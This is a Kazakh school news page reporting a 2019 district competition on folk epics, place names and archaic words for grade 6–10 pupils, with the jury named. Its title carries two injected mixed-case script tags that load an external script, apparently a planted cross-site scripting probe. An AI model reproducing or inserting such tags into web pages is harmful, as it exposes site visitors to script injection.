Текст
«Тұлпар мініп, ту алған!» атты аудандық байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
11.04.2019
- сәуір Балқашин № 2 орта мектебінде «Тұлпар мініп, ту алған!» атты аудандық байқауы өткізілді. Байқау ауданымыздың Мәдениет қазақ-орыс ОМ, Қызыл Қазақстан НМ, Балқашин №1 ОМ, Жыланды ОМ 6-10 сынып оқушыларының арасында өтті. Ережеге сәйкес байқау үш кезеңнен тұрды. І кезең жыр айтудан сайыс, ІІ кезең жер-су аттары ІІІ кезеңде көнерген, тарихи сөздердің мән-мағынасын ашу. Байқау он балдық жүйемен белгіленетін болады. Байқаудың әділ-қазылар алқасы Копабаев Меңдібай Сайлаубайұлы – Сандықтау аудандық тілдерді оқыту орталығының директоры; Шарипов Медет Серікұлы – Сандықтау орта мектебінің қазақ тілі мен әдебиеті мұғалімі; Болатов Қанат Өмірбекұлы – Балкашин №1 ОМ тарих мұғалімі. Байқаудың басты мақсаты - қазақ эпосына деген қызығушылықты арттыру, халық ауыз әдебиетін жан-жақты насихаттау. Осылайша, бабаларымыздан қалған көне сөздерді, фольклорымызды балаларымыздың санасына сіңіру. Отанын сүйетін, тарихи жәдігерін қастерлей алатын ұл-қыз тәрбиелеу.
Просмотров: 992